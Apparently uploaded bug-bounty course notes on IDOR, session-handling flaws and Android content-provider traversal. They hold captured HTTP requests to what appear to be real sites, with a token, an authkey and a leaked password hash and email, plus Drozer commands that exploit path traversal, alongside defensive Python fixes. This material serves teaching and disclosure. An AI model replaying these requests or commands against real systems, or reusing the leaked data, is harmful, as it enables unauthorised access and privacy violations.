Day 9 Last Day

The document discusses insecure direct object reference (IDOR) vulnerabilities. It provides examples of IDOR issues where an attacker can access or modify unauthorized user data by manipulating ID parameters. It also discusses related topics like improper session handling vulnerabilities.

Uploaded by

tapiwarusike

IDOR - Insecure Direct Object Reference -

https://abc.com/userprofile?id=1234  - asif

Aman -
https://abc.com/userprofile?id=12345
https://abc.com/userprofile?id=1234

The attacker is able to access, manipulate or modify an id parameter in a way that should not be allowed.

Access to unauthorized data - if an attacker can guess or increment the id parameter and access another user's data, it is an IDOR vulnerability.

PII

POST /rajsacademy_app_ctrl/get_profile HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0; Phone Build/MRA58K)
Host: www.rajsacademy.com
Connection: close
Accept-Encoding: gzip, deflate
Content-Length: 163

user_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IjkyMTgiLCJkZXZpY2VfaWQiOiI3ZTljMDlmZDExNjY2MTUifQ.Z6aGWoYplx9GJ7yHmckG7iztOOM3V1p13gfjt98DMGw&userid=9210&

HTTP/1.1 200 OK
Date: Tue, 26 Sep 2023 13:41:45 GMT
Server: Apache/2.4.54 (Ubuntu)
Set-Cookie: ci_session=3f10pih9he4kdpulivlb7ctprupvpk4q; expires=Tue, 26-Sep-2023 15:41:45 GMT; Max-Age=7200; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 150
Connection: close
Content-Type: application/json

{"status":true,"message":"Success","image":"","name":"Aiswarya","location":"","mobile":"","email":"@gmail.com"}

The profile returned is selected by the userid value in the form body. It is an IDOR when the server does not check that id against the user the user_token identifies; the fix is to take the subject from the verified token or session instead of from a client-supplied id.
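The following is an added example, not code from the notes or from the application shown above. It models the get_profile endpoint in plain Python: a token-only check that then trusts the client-supplied userid (the IDOR shape), beside a fixed handler that takes the subject from the verified token. The HS256 key, the USERS table, and the user ids 9218/9210 are constructed assumptions for the harness.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed, hypothetical signing key and user table; nothing here is from the page.
SECRET_KEY = b"constructed-hs256-key"
USERS = {
    "9218": {"name": "User A", "email": "a@example.invalid"},
    "9210": {"name": "User B", "email": "b@example.invalid"},
}


def _b64url_decode(segment: str) -> bytes:
    # JWT segments are unpadded base64url; restore padding before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def make_token(payload: dict) -> str:
    """Mint an HS256 JWT (harness helper; a real app has an issuer for this)."""
    header = _b64url_encode(json.dumps({"typ": "JWT", "alg": "HS256"}).encode())
    body = _b64url_encode(json.dumps(payload).encode())
    sig = hmac.new(SECRET_KEY, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url_encode(sig)}"


def verify_token(token: str) -> Optional[dict]:
    """Return the claims only if the token is well formed and its HS256 signature is valid."""
    try:
        header, body, sig = token.split(".")
        if json.loads(_b64url_decode(header)).get("alg") != "HS256":
            return None  # do not let the token pick the algorithm
        expected = hmac.new(SECRET_KEY, f"{header}.{body}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(sig)):
            return None
        return json.loads(_b64url_decode(body))
    except ValueError:  # wrong segment count, bad base64, bad JSON
        return None


def get_profile_vulnerable(form: dict) -> dict:
    """IDOR: the token only proves someone is logged in; the record returned
    is whichever userid the client put in the form."""
    if verify_token(form.get("user_token", "")) is None:
        return {"status": False, "message": "Unauthorized"}
    user = USERS.get(form.get("userid"))
    if user is None:
        return {"status": False, "message": "Not found"}
    return {"status": True, "message": "Success", **user}


def get_profile_fixed(form: dict) -> dict:
    """Fixed: the subject is the id bound into the verified token. A client-supplied
    userid is accepted only when it names that same user."""
    claims = verify_token(form.get("user_token", ""))
    if claims is None:
        return {"status": False, "message": "Unauthorized"}
    subject = claims.get("id")
    requested = form.get("userid", subject)
    if requested != subject or subject not in USERS:
        return {"status": False, "message": "Forbidden"}
    return {"status": True, "message": "Success", **USERS[subject]}
```

The point of the fixed handler is that the object reference the client sends is redundant: the server already knows who the caller is from the signature-checked claims, so any id that disagrees with those claims is refused rather than looked up.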

IDOR - High

OTP - raj - vul

OTP bypass + IDOR = account takeover - Critical - chaining

IDOR - OTP - account takeover

2020 - app - $2k
Improper Session Handling

Swiggy - login - making a profile - changing the name - logout

Asif - Swiggy - name - asif1 - logout - asif123 (the name change is still accepted after logout)

Burp Suite

POST /api/v2/edit_user HTTP/1.1
authkey: 123456
Content-Length: 302
Content-Type: application/x-www-form-urlencoded
Host: jaipursabjimandi.com
Connection: close
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

device_id=d0tHS7lyEMY%3AAPA91bFBIQt8Y2rYklzhykZZoSAdV1TeevLXcVH3JVfPOyhhtGa7OonoM2_NEDUogWuoyfEiXrvKhCzhfmVTpXt7-BonhM_vFtSeVBB6P39sQnB6XODJ21FrRH4BgU44fB4Vbf1gdmWm&device_type=android&user_id=12525&zipcode=665464&email=propubgking123%40gmail.com&username=null&full_name=asif123&phone_number=8676575676

HTTP/1.1 200 OK
date: Tue, 26 Sep 2023 13:49:12 GMT
server: Apache/2.4.41 (Ubuntu)
cache-control: no-cache, private
x-ratelimit-limit: 60
x-ratelimit-remaining: 59
vary: Accept-Encoding
content-length: 899
content-type: text/html; charset=UTF-8
connection: close

{"status":"success","message":"Your profile has been updated successfully.","data":{"id":"12525","user_role_id":"0","first_name":"","last_name":"","full_name":"asif123","slug":"test","username":null,"email":"propubgking123@gmail.com","phone_number":"8676575676","password":"$2y$10$j9aTuTnD7K3kxpM19rjsFunh48PQRrSlC99Hh4o1v1kiAbikpcEKS","image":"https:\/\/fanyv88.com:443\/https\/jaipursabjimandi.com\/img\/usr_img.png","is_verified":"0","is_active":"1","validate_string":"66731158181c5150bf4d6a5f59754678","forgot_password_validate_string":null,"verification_code":null,"is_deleted":"0","remember_token":null,"agent_code":"","created_at":"2023-09-26 18:24:24","updated_at":"2023-09-26 19:19:12","deleted_at":"0","device_type":"android","device_id":"d0tHS7lyEMY:APA91bFBIQt8Y2rYklzhykZZoSAdV1TeevLXcVH3JVfPOyhhtGa7OonoM2_NEDUogWuoyfEiXrvKhCzhfmVTpXt7-BonhM_vFtSeVBB6P39sQnB6XODJ21FrRH4BgU44fB4Vbf1gdmWm","zipcode":"665464"}}

Note that the request is authorised only by a fixed authkey header plus a client-chosen user_id, and that the response echoes the entire stored user row, including the bcrypt password hash and validate_string, back to the client.
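The following is an added example, not code from the notes or from the application above. It contrasts the shape of the edit_user request (a static key plus a client-chosen user_id, which nothing revokes at logout) with a server-side session store whose logout actually invalidates the token, and whose response returns only the fields the client needs. STATIC_AUTHKEY, the profiles dict and the 7200-second lifetime are constructed assumptions.

```python
import secrets
import time
from typing import Optional

# Constructed example of a hard-coded client key: anyone holding it can edit any
# user_id, and logging out cannot revoke it because the server keeps no state.
STATIC_AUTHKEY = "constructed-static-key"


class SessionStore:
    """Server-side session table mapping an opaque token to (user_id, expiry)."""

    def __init__(self, ttl_seconds: int = 7200):
        self._sessions = {}
        self._ttl = ttl_seconds

    def login(self, user_id: str, now: Optional[float] = None) -> str:
        token = secrets.token_urlsafe(32)  # unguessable, minted per login
        start = now if now is not None else time.time()
        self._sessions[token] = (user_id, start + self._ttl)
        return token

    def logout(self, token: str) -> None:
        # Logout must invalidate the session on the server; only clearing the
        # token on the client leaves the old session usable.
        self._sessions.pop(token, None)

    def resolve(self, token: str, now: Optional[float] = None) -> Optional[str]:
        """Return the user_id bound to a live session token, else None."""
        entry = self._sessions.get(token)
        if entry is None:
            return None
        user_id, expires = entry
        if (now if now is not None else time.time()) >= expires:
            self._sessions.pop(token, None)  # expired: drop it
            return None
        return user_id


def edit_user_vulnerable(authkey: str, form: dict, profiles: dict) -> dict:
    """Before: a static key authorises an edit of whichever user_id the form names."""
    if authkey != STATIC_AUTHKEY:
        return {"status": "error", "message": "Unauthorized"}
    profile = profiles.get(form.get("user_id"))
    if profile is None:
        return {"status": "error", "message": "Not found"}
    profile["full_name"] = form["full_name"]
    # Echoing the whole row back also leaks fields such as the password hash.
    return {"status": "success", "data": dict(profile)}


def edit_user_fixed(store: SessionStore, token: str, form: dict, profiles: dict,
                    now: Optional[float] = None) -> dict:
    """After: the session decides whose profile is edited; a client user_id is ignored."""
    user_id = store.resolve(token, now)
    if user_id is None:
        return {"status": "error", "message": "Session expired or invalid"}
    profile = profiles[user_id]
    profile["full_name"] = form["full_name"]
    # Return only what the client needs; never the password hash or validation strings.
    return {"status": "success", "data": {"id": user_id, "full_name": profile["full_name"]}}
```

The `now` parameter exists so the expiry path can be exercised deterministically; in production the store would live in a shared backend (database or cache) so that logout on one server invalidates the session everywhere.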

Local File Inclusion

Drozer
Application

content providers exported 1, 2, 3

Getting the package name

Attack surface
Info for provider
Finding URI
Scanning vulnerable URI
Exploit

Report a vul/bug -

run app.package.attacksurface com.mwr.example.sieve
run app.provider.info -a com.mwr.example.sieve
run app.provider.finduri com.mwr.example.sieve
run scanner.provider.traversal -a com.mwr.example.sieve
run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/proc/cpuinfo
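The following is an added example, not code from the notes or from the sieve app. The drozer scan above looks for a provider that opens whatever path is in the content URI; the missing check on the provider side is path canonicalisation against an allowed root. This is a Python model of that check (the real implementation would sit in an Android ContentProvider's openFile), and the authority string and BACKUP_ROOT are hypothetical.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote, urlsplit

# Hypothetical provider authority and the only directory it may serve from.
PROVIDER_AUTHORITY = "com.example.app.FileBackupProvider"
BACKUP_ROOT = "/data/data/com.example.app/files/backup"


def resolve_provider_path(uri: str) -> Optional[str]:
    """Map a content:// URI to an absolute file path, or None if it is not
    a path inside BACKUP_ROOT for this provider's authority."""
    parts = urlsplit(uri)
    if parts.scheme != "content" or parts.netloc != PROVIDER_AUTHORITY:
        return None
    # Decode once so %2e%2e%2f is seen as ../ before normalisation.
    relative = unquote(parts.path).lstrip("/")
    candidate = posixpath.normpath(posixpath.join(BACKUP_ROOT, relative))
    # After normalisation the path must still be the root or something below it.
    if candidate != BACKUP_ROOT and not candidate.startswith(BACKUP_ROOT + "/"):
        return None
    return candidate


def open_backup(uri: str) -> str:
    """Decide whether a read request would be served; returns a short verdict."""
    path = resolve_provider_path(uri)
    return "denied" if path is None else f"serve {path}"
```

Canonicalising and then comparing against the root is the check; a blacklist of the literal string `..` misses encoded and mixed forms. Independently of the path check, a provider that other apps do not need to reach should not be exported at all.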

Responsible Disclosure / vul report

Vulnerability Name - IDOR

Vulnerable URL/App - http://abc.com/ , app name, version

Description -

Steps to reproduce - the steps that we have taken to find the bug

Impact -

POC - proof of concept - img/photo/video

Solution -

Project -
Application
3 days

4 vul - app

App - 4 vul.
Asif.apk -12 vuls -4 vul.

Minimum 4

Thecyberhost , name ,index
